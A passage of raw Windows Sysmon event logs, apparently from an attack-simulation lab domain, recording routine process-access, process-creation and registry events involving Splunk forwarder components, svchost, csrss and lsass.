22:14:33.003{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362574Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:33.003{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362573Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:33.003{8e433fbf-2a44-6013-0600-000000001100}7565040C:\Windows\system32\csrss.exe{8e433fbf-3749-6013-c703-000000001100}11240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362572Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:33.003{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-3749-6013-c703-000000001100}11240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362571Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:33.004{8e433fbf-3749-6013-c703-000000001100}11240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000033077Microsoft-Windows-Sysmon/Operationalwin-dc-862.attackrange.local-2021-01-28 22:14:33.318{FF16AF91-26B5-6013-0B00-00000000A401}8603460C:\Windows\system32\lsass.exe{FF16AF91-26B3-6013-0100-00000000A401}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x8000000000000000362580Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:34.316{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362596Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:40.868{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-3750-6013-c903-000000001100}10668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362595Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:40.868{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362594Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:40.868{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362593Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:40.868{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362592Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:40.868{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362591Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:40.868{8e433fbf-2a44-6013-0600-000000001100}7561420C:\Windows\system32\csrss.exe{8e433fbf-3750-6013-c903-000000001100}10668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362590Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:40.868{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-3750-6013-c903-000000001100}10668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362589Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:40.869{8e433fbf-3750-6013-c903-000000001100}10668C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362588Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:40.196{8e433fbf-2a47-6013-6600-000000001100}53205376C:\Windows\system32\conhost.exe{8e433fbf-3750-6013-c803-000000001100}9720C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362587Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:40.196{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362586Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:40.196{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362585Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:40.196{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362584Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:40.196{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362583Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:40.196{8e433fbf-2a44-6013-0600-000000001100}7561420C:\Windows\system32\csrss.exe{8e433fbf-3750-6013-c803-000000001100}9720C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000362582Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:40.196{8e433fbf-2a45-6013-4f00-000000001100}37406536C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8e433fbf-3750-6013-c803-000000001100}9720C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+20e72|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000362581Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:40.197{8e433fbf-3750-6013-c803-000000001100}9720C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000362597Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:41.040{8e433fbf-3750-6013-c903-000000001100}106684908C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{8e433fbf-2a45-6013-4f00-000000001100}3740C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362598Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:44.415{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rasmans.dll+3751b|c:\windows\system32\rasmans.dll+36fad|c:\windows\system32\rasmans.dll+10ed8|c:\windows\system32\rasmans.dll+33cd5|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 13241300x8000000000000000362608Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:14:48.510{8e433fbf-2a44-6013-0c00-000000001100}980C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000362607Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:14:48.510{8e433fbf-2a44-6013-0c00-000000001100}980C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00334eb4) 13241300x8000000000000000362606Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:14:48.510{8e433fbf-2a44-6013-0c00-000000001100}980C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6f5ba-0x9b98bdb8) 13241300x8000000000000000362605Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:14:48.510{8e433fbf-2a44-6013-0c00-000000001100}980C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6f5c2-0xfd5d25b8) 13241300x8000000000000000362604Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:14:48.510{8e433fbf-2a44-6013-0c00-000000001100}980C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6f5cb-0x5f218db8) 13241300x8000000000000000362603Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:14:48.510{8e433fbf-2a44-6013-0c00-000000001100}980C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000362602Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:14:48.510{8e433fbf-2a44-6013-0c00-000000001100}980C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00334eb4) 13241300x8000000000000000362601Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:14:48.510{8e433fbf-2a44-6013-0c00-000000001100}980C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d6f5ba-0x9b98bdb8) 13241300x8000000000000000362600Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:14:48.510{8e433fbf-2a44-6013-0c00-000000001100}980C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d6f5c2-0xfd5d25b8) 13241300x8000000000000000362599Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:14:48.510{8e433fbf-2a44-6013-0c00-000000001100}980C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d6f5cb-0x5f218db8) 10341000x8000000000000000362609Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:14:54.495{8e433fbf-2a46-6013-5700-000000001100}34164116C:\Windows\System32\svchost.exe{8e433fbf-2a45-6013-4c00-000000001100}3676C:\Program 